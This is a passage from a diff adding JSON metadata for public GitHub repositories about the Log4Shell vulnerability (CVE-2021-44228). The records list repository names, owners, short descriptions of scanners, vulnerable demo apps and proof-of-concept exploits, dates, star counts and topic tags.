+ "updated_at": "2023-03-07T19:39:44Z",
+ "pushed_at": "2022-01-01T15:31:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": true,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "hunting",
+ "threat"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 443614046,
+ "name": "gh-repo-clone-marklindsey11--CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CV",
+ "full_name": "marklindsey11\/gh-repo-clone-marklindsey11--CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CV",
+ "owner": {
+ "login": "marklindsey11",
+ "id": 81498475,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81498475?v=4",
+ "html_url": "https:\/\/github.com\/marklindsey11"
+ },
+ "html_url": "https:\/\/github.com\/marklindsey11\/gh-repo-clone-marklindsey11--CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CV",
+ "description": "Log4j-Scanner",
+ "fork": false,
+ "created_at": "2022-01-01T20:01:01Z",
+ "updated_at": "2022-01-01T20:01:06Z",
+ "pushed_at": "2022-01-01T20:01:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 443941194,
+ "name": "log4j2-test",
+ "full_name": "mklinkj\/log4j2-test",
+ "owner": {
+ "login": "mklinkj",
+ "id": 96992046,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96992046?v=4",
+ "html_url": "https:\/\/github.com\/mklinkj"
+ },
+ "html_url": "https:\/\/github.com\/mklinkj\/log4j2-test",
+ "description": "Log4j2 LDAP 취약점 테스트 (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2022-01-03T04:36:41Z",
+ "updated_at": "2024-01-14T11:55:27Z",
+ "pushed_at": "2024-01-13T19:12:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j2"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 444275342,
+ "name": "4jfinder.github.io",
+ "full_name": "4jfinder\/4jfinder.github.io",
+ "owner": {
+ "login": "4jfinder",
+ "id": 97116800,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97116800?v=4",
+ "html_url": "https:\/\/github.com\/4jfinder"
+ },
+ "html_url": "https:\/\/github.com\/4jfinder\/4jfinder.github.io",
+ "description": "Searchable page for CISA Log4j (CVE-2021-44228) Affected Vendor & Software List",
+ "fork": false,
+ "created_at": "2022-01-04T03:37:03Z",
+ "updated_at": "2022-08-17T00:21:21Z",
+ "pushed_at": "2022-02-25T08:52:45Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 444603389,
+ "name": "CVE-2021-44228_scanner-main-Modified-",
+ "full_name": "alexpena5635\/CVE-2021-44228_scanner-main-Modified-",
+ "owner": {
+ "login": "alexpena5635",
+ "id": 74330769,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74330769?v=4",
+ "html_url": "https:\/\/github.com\/alexpena5635"
+ },
+ "html_url": "https:\/\/github.com\/alexpena5635\/CVE-2021-44228_scanner-main-Modified-",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-05T00:14:08Z",
+ "updated_at": "2022-01-09T01:45:00Z",
+ "pushed_at": "2022-07-10T22:02:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 444719044,
+ "name": "log4j2-web-vulnerable",
+ "full_name": "kanitan\/log4j2-web-vulnerable",
+ "owner": {
+ "login": "kanitan",
+ "id": 26276619,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26276619?v=4",
+ "html_url": "https:\/\/github.com\/kanitan"
+ },
+ "html_url": "https:\/\/github.com\/kanitan\/log4j2-web-vulnerable",
+ "description": "A vulnerable web app for log4j2 RCE(CVE-2021-44228) exploit test.",
+ "fork": false,
+ "created_at": "2022-01-05T08:13:32Z",
+ "updated_at": "2022-01-05T09:11:45Z",
+ "pushed_at": "2022-01-05T09:11:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 444777926,
+ "name": "CVE-2021-44228",
+ "full_name": "mr-r3b00t\/CVE-2021-44228",
+ "owner": {
+ "login": "mr-r3b00t",
+ "id": 14963690,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4",
+ "html_url": "https:\/\/github.com\/mr-r3b00t"
+ },
+ "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2021-44228",
+ "description": "Backdoor detection for VMware view",
+ "fork": false,
+ "created_at": "2022-01-05T11:27:16Z",
+ "updated_at": "2023-09-28T11:34:45Z",
+ "pushed_at": "2022-01-05T12:37:39Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 444852717,
+ "name": "Log4j_Vulnerability_Demo",
+ "full_name": "ChandanShastri\/Log4j_Vulnerability_Demo",
+ "owner": {
+ "login": "ChandanShastri",
+ "id": 25263964,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25263964?v=4",
+ "html_url": "https:\/\/github.com\/ChandanShastri"
+ },
+ "html_url": "https:\/\/github.com\/ChandanShastri\/Log4j_Vulnerability_Demo",
+ "description": "A simple program to demonstrate how Log4j vulnerability can be exploited ( CVE-2021-44228 ) ",
+ "fork": false,
+ "created_at": "2022-01-05T15:24:20Z",
+ "updated_at": "2023-03-04T10:10:26Z",
+ "pushed_at": "2022-01-12T04:36:45Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 444967250,
+ "name": "Log4jHorizon",
+ "full_name": "puzzlepeaches\/Log4jHorizon",
+ "owner": {
+ "login": "puzzlepeaches",
+ "id": 8538866,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8538866?v=4",
+ "html_url": "https:\/\/github.com\/puzzlepeaches"
+ },
+ "html_url": "https:\/\/github.com\/puzzlepeaches\/Log4jHorizon",
+ "description": "Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.",
+ "fork": false,
+ "created_at": "2022-01-05T22:25:42Z",
+ "updated_at": "2024-06-19T19:31:55Z",
+ "pushed_at": "2022-01-10T19:26:59Z",
+ "stargazers_count": 118,
+ "watchers_count": 118,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 118,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 445474259,
+ "name": "log4jshell_CVE-2021-44228",
+ "full_name": "Vulnmachines\/log4jshell_CVE-2021-44228",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/log4jshell_CVE-2021-44228",
+ "description": "Log4jshell - CVE-2021-44228",
+ "fork": false,
+ "created_at": "2022-01-07T09:56:30Z",
+ "updated_at": "2023-03-31T16:40:36Z",
+ "pushed_at": "2022-07-26T05:17:19Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 445687561,
+ "name": "log4j-fuzzer",
+ "full_name": "mr-vill4in\/log4j-fuzzer",
+ "owner": {
+ "login": "mr-vill4in",
+ "id": 51061936,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51061936?v=4",
+ "html_url": "https:\/\/github.com\/mr-vill4in"
+ },
+ "html_url": "https:\/\/github.com\/mr-vill4in\/log4j-fuzzer",
+ "description": "CVE-2021-44228",
+ "fork": false,
+ "created_at": "2022-01-08T00:28:32Z",
+ "updated_at": "2022-08-25T01:38:48Z",
+ "pushed_at": "2022-03-19T21:10:47Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 445745731,
+ "name": "vuln4japi",
+ "full_name": "nix-xin\/vuln4japi",
+ "owner": {
+ "login": "nix-xin",
+ "id": 9593989,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9593989?v=4",
+ "html_url": "https:\/\/github.com\/nix-xin"
+ },
+ "html_url": "https:\/\/github.com\/nix-xin\/vuln4japi",
+ "description": "A vulnerable Java based REST API for demonstrating CVE-2021-44228 (log4shell).",
+ "fork": false,
+ "created_at": "2022-01-08T06:45:44Z",
+ "updated_at": "2023-08-15T01:44:22Z",
+ "pushed_at": "2022-01-10T08:20:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 446098711,
+ "name": "CVE-2021-44228",
+ "full_name": "maximofernandezriera\/CVE-2021-44228",
+ "owner": {
+ "login": "maximofernandezriera",
+ "id": 43608040,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43608040?v=4",
+ "html_url": "https:\/\/github.com\/maximofernandezriera"
+ },
+ "html_url": "https:\/\/github.com\/maximofernandezriera\/CVE-2021-44228",
+ "description": "This Log4j RCE exploit originated from https:\/\/github.com\/tangxiaofeng7\/CVE-2021-44228-Apache-Log4j-Rce",
+ "fork": false,
+ "created_at": "2022-01-09T13:38:38Z",
+ "updated_at": "2024-01-30T05:00:29Z",
+ "pushed_at": "2022-01-09T13:43:35Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 446218653,
+ "name": "log4jhound",
+ "full_name": "mebibite\/log4jhound",
+ "owner": {
+ "login": "mebibite",
+ "id": 54244269,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54244269?v=4",
+ "html_url": "https:\/\/github.com\/mebibite"
+ },
+ "html_url": "https:\/\/github.com\/mebibite\/log4jhound",
+ "description": "Created after the disclosure of CVE-2021-44228. Bash script that detects Log4j occurrences in your projects and systems, allowing you to get insight on versions used. Unpacks JARs and analyses their Manifest files.",
+ "fork": false,
+ "created_at": "2022-01-09T22:34:49Z",
+ "updated_at": "2024-04-22T19:41:40Z",
+ "pushed_at": "2022-04-01T00:43:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 447404470,
+ "name": "log4shell",
+ "full_name": "jxerome\/log4shell",
+ "owner": {
+ "login": "jxerome",
+ "id": 1355634,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1355634?v=4",
+ "html_url": "https:\/\/github.com\/jxerome"
+ },
+ "html_url": "https:\/\/github.com\/jxerome\/log4shell",
+ "description": "Démo du fonctionnement de log4shell (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2022-01-12T23:44:20Z",
+ "updated_at": "2022-01-12T23:59:13Z",
+ "pushed_at": "2022-01-14T14:03:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 447615580,
+ "name": "Log4j-CVE-2021-44228",
+ "full_name": "solitarysp\/Log4j-CVE-2021-44228",
+ "owner": {
+ "login": "solitarysp",
+ "id": 20993683,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20993683?v=4",
+ "html_url": "https:\/\/github.com\/solitarysp"
+ },
+ "html_url": "https:\/\/github.com\/solitarysp\/Log4j-CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-13T13:46:12Z",
+ "updated_at": "2022-01-13T13:46:52Z",
+ "pushed_at": "2022-01-13T14:43:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 447682859,
+ "name": "log4j-exploit-builder",
+ "full_name": "atlassion\/log4j-exploit-builder",
+ "owner": {
+ "login": "atlassion",
+ "id": 49542929,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49542929?v=4",
+ "html_url": "https:\/\/github.com\/atlassion"
+ },
+ "html_url": "https:\/\/github.com\/atlassion\/log4j-exploit-builder",
+ "description": "Script to create a log4j (CVE-2021-44228) exploit with support for different methods of getting a reverse shell",
+ "fork": false,
+ "created_at": "2022-01-13T17:03:54Z",
+ "updated_at": "2022-06-30T18:53:34Z",
+ "pushed_at": "2021-12-29T18:34:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 447683203,
+ "name": "RS4LOGJ-CVE-2021-44228",
+ "full_name": "atlassion\/RS4LOGJ-CVE-2021-44228",
+ "owner": {
+ "login": "atlassion",
+ "id": 49542929,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49542929?v=4",
+ "html_url": "https:\/\/github.com\/atlassion"
+ },
+ "html_url": "https:\/\/github.com\/atlassion\/RS4LOGJ-CVE-2021-44228",
+ "description": "Fix: CVE-2021-44228 4LOGJ",
+ "fork": false,
+ "created_at": "2022-01-13T17:04:52Z",
+ "updated_at": "2022-01-19T12:29:27Z",
+ "pushed_at": "2021-12-28T13:50:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 447754863,
+ "name": "log4j_github_repository",
+ "full_name": "sdogancesur\/log4j_github_repository",
+ "owner": {
+ "login": "sdogancesur",
+ "id": 34608448,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34608448?v=4",
+ "html_url": "https:\/\/github.com\/sdogancesur"
+ },
+ "html_url": "https:\/\/github.com\/sdogancesur\/log4j_github_repository",
+ "description": "This work includes testing and improvement tools for CVE-2021-44228(log4j).",
+ "fork": false,
+ "created_at": "2022-01-13T21:16:26Z",
+ "updated_at": "2023-05-29T16:42:26Z",
+ "pushed_at": "2022-01-15T18:52:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448039430,
+ "name": "Search-log4Jvuln-AppScanSTD",
+ "full_name": "jrocia\/Search-log4Jvuln-AppScanSTD",
+ "owner": {
+ "login": "jrocia",
+ "id": 69405400,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69405400?v=4",
+ "html_url": "https:\/\/github.com\/jrocia"
+ },
+ "html_url": "https:\/\/github.com\/jrocia\/Search-log4Jvuln-AppScanSTD",
+ "description": "This Pwsh script run AppScan Standard scans against a list of web sites (URLs.txt) checking for Log4J (CVE-2021-44228) vulnerability",
+ "fork": false,
+ "created_at": "2022-01-14T16:47:20Z",
+ "updated_at": "2022-01-14T16:54:21Z",
+ "pushed_at": "2022-01-14T18:34:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448612058,
+ "name": "log4stdin",
+ "full_name": "aajuvonen\/log4stdin",
+ "owner": {
+ "login": "aajuvonen",
+ "id": 97843492,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97843492?v=4",
+ "html_url": "https:\/\/github.com\/aajuvonen"
+ },
+ "html_url": "https:\/\/github.com\/aajuvonen\/log4stdin",
+ "description": "A Java application intentionally vulnerable to CVE-2021-44228",
+ "fork": false,
+ "created_at": "2022-01-16T16:39:19Z",
+ "updated_at": "2022-04-02T16:13:36Z",
+ "pushed_at": "2023-03-17T09:09:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4shell",
+ "vulnerable-application"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 448890655,
+ "name": "PS-CVE-2021-44228",
+ "full_name": "arnaudluti\/PS-CVE-2021-44228",
+ "owner": {
+ "login": "arnaudluti",
+ "id": 41639163,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41639163?v=4",
+ "html_url": "https:\/\/github.com\/arnaudluti"
+ },
+ "html_url": "https:\/\/github.com\/arnaudluti\/PS-CVE-2021-44228",
+ "description": "Static detection of vulnerable log4j librairies on Windows servers, members of an AD domain.",
+ "fork": false,
+ "created_at": "2022-01-17T12:46:20Z",
+ "updated_at": "2022-01-19T08:30:13Z",
+ "pushed_at": "2022-01-19T08:31:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 449417650,
+ "name": "CVE-2021-44228-Log4Shell-POC",
+ "full_name": "ColdFusionX\/CVE-2021-44228-Log4Shell-POC",
+ "owner": {
+ "login": "ColdFusionX",
+ "id": 8522240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4",
+ "html_url": "https:\/\/github.com\/ColdFusionX"
+ },
+ "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2021-44228-Log4Shell-POC",
+ "description": "POC for Infamous Log4j CVE-2021-44228",
+ "fork": false,
+ "created_at": "2022-01-18T19:22:38Z",
+ "updated_at": "2023-09-28T11:35:10Z",
+ "pushed_at": "2022-01-20T15:28:58Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "jndi-exploit",
+ "jndi-lookups",
+ "ldap",
+ "log4j",
+ "log4j2",
+ "log4shell",
+ "poc",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 450033114,
+ "name": "cve-2021-44228-waf-tests",
+ "full_name": "robrankin\/cve-2021-44228-waf-tests",
+ "owner": {
+ "login": "robrankin",
+ "id": 1881181,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1881181?v=4",
+ "html_url": "https:\/\/github.com\/robrankin"
+ },
+ "html_url": "https:\/\/github.com\/robrankin\/cve-2021-44228-waf-tests",
+ "description": "Testing WAF protection against CVE-2021-44228 Log4Shell",
+ "fork": false,
+ "created_at": "2022-01-20T09:30:44Z",
+ "updated_at": "2023-08-24T16:30:43Z",
+ "pushed_at": "2022-01-20T12:29:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452823928,
+ "name": "log4j-polkit-poc",
+ "full_name": "0xalwayslucky\/log4j-polkit-poc",
+ "owner": {
+ "login": "0xalwayslucky",
+ "id": 28390940,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28390940?v=4",
+ "html_url": "https:\/\/github.com\/0xalwayslucky"
+ },
+ "html_url": "https:\/\/github.com\/0xalwayslucky\/log4j-polkit-poc",
+ "description": "vulnerable setup to display an attack chain of log4j CVE-2021-44228 with privilege escalation to root using the polkit exploit CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-27T19:54:16Z",
+ "updated_at": "2022-01-29T06:29:58Z",
+ "pushed_at": "2022-01-28T15:08:53Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453952325,
+ "name": "yLog4j",
+ "full_name": "y-security\/yLog4j",
+ "owner": {
+ "login": "y-security",
+ "id": 86777723,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86777723?v=4",
+ "html_url": "https:\/\/github.com\/y-security"
+ },
+ "html_url": "https:\/\/github.com\/y-security\/yLog4j",
+ "description": "PortSwigger Burp Plugin for the Log4j (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2022-01-31T09:54:19Z",
+ "updated_at": "2023-05-02T06:58:40Z",
+ "pushed_at": "2022-01-31T10:23:27Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 458405084,
+ "name": "Log4Shell",
+ "full_name": "FeryaelJustice\/Log4Shell",
+ "owner": {
+ "login": "FeryaelJustice",
+ "id": 47835172,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47835172?v=4",
+ "html_url": "https:\/\/github.com\/FeryaelJustice"
+ },
+ "html_url": "https:\/\/github.com\/FeryaelJustice\/Log4Shell",
+ "description": "This repository is for Log4j 2021 (CVE-2021-44228) Vulnerability demonstration and mitigation.",
+ "fork": false,
+ "created_at": "2022-02-12T03:02:24Z",
+ "updated_at": "2022-02-12T03:02:24Z",
+ "pushed_at": "2022-02-12T04:11:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 458500087,
+ "name": "CVE-2021-44228-white-box",
+ "full_name": "hotpotcookie\/CVE-2021-44228-white-box",
+ "owner": {
+ "login": "hotpotcookie",
+ "id": 68333318,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68333318?v=4",
+ "html_url": "https:\/\/github.com\/hotpotcookie"
+ },
+ "html_url": "https:\/\/github.com\/hotpotcookie\/CVE-2021-44228-white-box",
+ "description": "Log4j vulner testing environment based on CVE-2021-44228. It provide guidance to build the sample infrastructure and the exploit scripts. Supporting cooki3 script as the main exploit tools & integration",
+ "fork": false,
+ "created_at": "2022-02-12T11:19:41Z",
+ "updated_at": "2024-04-28T06:08:38Z",
+ "pushed_at": "2023-09-06T11:47:42Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "badusb",
+ "cooki3",
+ "cve-2021-44228",
+ "java",
+ "ldap-authentication",
+ "log4j2",
+ "log4shell",
+ "penetration-testing",
+ "ptes"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 459806805,
+ "name": "l4srs",
+ "full_name": "s-retlaw\/l4srs",
+ "owner": {
+ "login": "s-retlaw",
+ "id": 73955369,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73955369?v=4",
+ "html_url": "https:\/\/github.com\/s-retlaw"
+ },
+ "html_url": "https:\/\/github.com\/s-retlaw\/l4srs",
+ "description": "Rust implementation of the Log 4 Shell (log 4 j - CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2022-02-16T01:13:08Z",
+ "updated_at": "2022-02-16T01:21:29Z",
+ "pushed_at": "2023-01-14T19:59:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 463165453,
+ "name": "Log-4j-scanner",
+ "full_name": "Ananya-0306\/Log-4j-scanner",
+ "owner": {
+ "login": "Ananya-0306",
+ "id": 74227338,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74227338?v=4",
+ "html_url": "https:\/\/github.com\/Ananya-0306"
+ },
+ "html_url": "https:\/\/github.com\/Ananya-0306\/Log-4j-scanner",
+ "description": "A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228",
+ "fork": false,
+ "created_at": "2022-02-24T13:49:14Z",
+ "updated_at": "2022-04-29T13:54:03Z",
+ "pushed_at": "2022-03-04T13:30:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounty",
+ "cybersecurity",
+ "fork-for-contribution",
+ "log4j",
+ "open-source",
+ "trending-repositories"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 467749739,
+ "name": "log4shellwithlog4j2_13_3",
+ "full_name": "paulvkitor\/log4shellwithlog4j2_13_3",
+ "owner": {
+ "login": "paulvkitor",
+ "id": 101220344,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101220344?v=4",
+ "html_url": "https:\/\/github.com\/paulvkitor"
+ },
